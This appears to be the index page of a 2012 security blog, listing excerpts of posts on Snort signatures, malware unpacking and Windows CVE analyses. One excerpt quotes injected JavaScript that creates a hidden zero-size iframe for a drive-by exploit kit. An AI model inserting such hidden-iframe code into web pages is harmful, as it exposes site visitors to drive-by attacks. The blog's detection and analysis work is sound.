Snort Signatures for LuckyCat APT Campaign

30 Mar 2012   | Author: Abhijeet |  No Comments

The Trend Micro blog published a paper titled Luckycat Redux, which looked into the activities of the Luckycat APT campaign. As per the report, the LuckyCat campaign targeted a diverse set of industries, including aerospace, shipping, energy, military and engineering, as well as Tibetan activists, using a variety of malware. Trend was able to trace the sources of the attack back to China. Below [...]

Manually unpacking Dorkbot

24 Mar 2012   | Author: Abhijeet |  No Comments

Yesterday I encountered another sample (SHA1: e3a7a9c9a5fcdc0b4bd6ffd9a5b83ba7a22353af) of Dorkbot while analyzing my honeypot. Knowing that most Dorkbot samples are packed with UPX, I used the upx tool to unpack the binary. However, just to recall my manual steps for unpacking binaries, I thought of writing this post. Let's use the PEiD tool to verify if [...]

NIDS signature for MS12-020 RDP DoS

19 Mar 2012   | Author: Abhijeet |  1 Comment

The signature specified in the previous entry was for detecting the RCE/DoS attempt within the TargetParams structure of the RDP protocol. However, the DoS PoC listed here exploits another structure, MaxParam, from the same RDP protocol. The PoC was developed by jduck (Joshua J. Drake) of Accuvant and sets the value of the first parameter, maxChannelIds, to 4294967295. This value causes [...]

Snort Signature for RDP TargetParams Exploit

17 Mar 2012   | Author: Abhijeet |  1 Comment

The release of exploit PoC code for CVE-2012-0002 by the finder himself has definitely increased the chances of exploitation of this vulnerability. Microsoft has released a patch to address the vulnerability. However, considering the patch deployment life cycle and the ongoing exploit attempts, we need to be proactive in detecting and blocking all attempts of [...]

Snort detections for Targeted attack using CVE-2012-0754 exploit

6 Mar 2012   | Author: Abhijeet |  No Comments

The Contagiodump blog published an analysis of a targeted attack using the new CVE-2012-0754 exploit. The blog covers the whole exploit attempt and gives great detail on the exploit and payload analysis. I will not repeat the analysis in this post but will talk about the key points. I liked the adjacent picture posted on the contagio blog, so [...]

Snort Detections for Drive-by Exploitkit

23 Feb 2012   | Author: Abhijeet |  No Comments

Today, while browsing for some information, I ended up landing on the website below. I accidentally had my Fiddler instance open and saw an embedded iframe in the website. Here is the snip of the injected iframe (the injected src URL is blank in the excerpt):

    window.setTimeout(function(){
      var JSinj=document.createElement('iframe');
      JSinj.src=''+escape(document.referrer||'');
      JSinj.width='0';
      JSinj.height='0';
      JSinj.frameborder='0';
      JSinj.marginheight='0';
      JSinj.marginwidth='0';
      JSinj.border='0';
      try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj);

The iframe took me to [...]

Detecting Data Exfiltration Attempts of TSPY_SPCESEND.A

11 Feb 2012   | Author: Abhijeet |  No Comments

Recently, a malware sample was seen in the wild which grabbed Microsoft Word and Excel files present on the infected system and uploaded them to a free file sharing website. File sharing websites have previously been, and still are, involved in malware drive-by attempts, but using them as a data exfiltration channel was seen for [...]

Snort Detection Rules for APT Malware MSUpdater.exe

3 Feb 2012   | Author: Abhijeet |  1 Comment

Background: On 31st January 2012, Zscaler and Seculert posted analyses of a recently identified RAT malware which is believed to be used in government-related targeted attacks. Both of these firms identified command and control beacon patterns and independently published them on their respective websites. As with all APT attacks, these C&C patterns were built [...]

Exploitation of CVE-2012-0003: Heap Overflow in winmm.dll

30 Jan 2012   | Author: Abhijeet |  1 Comment

The very first exploit for MS12-004 was seen in the wild last Friday. As soon as the exploit attempt was discovered, researchers were quick to post their analysis of the vulnerability. A Metasploit module was also made available to the public in its latest revision, 14640. In this post I will share a [...]

Understanding CVE-2012-0003: RCE in Microsoft Windows Media Player

29 Jan 2012   | Author: Abhijeet |  No Comments

As ever, the opinions expressed in this website are personal to me and do not necessarily reflect the opinions of my employer. As part of January's Patch Tuesday, we released 7 patches targeting 8 individual vulnerabilities. Out of these 8 vulnerabilities, I will talk about CVE-2012-0003, a memory corruption vulnerability in the Windows Media component that [...]
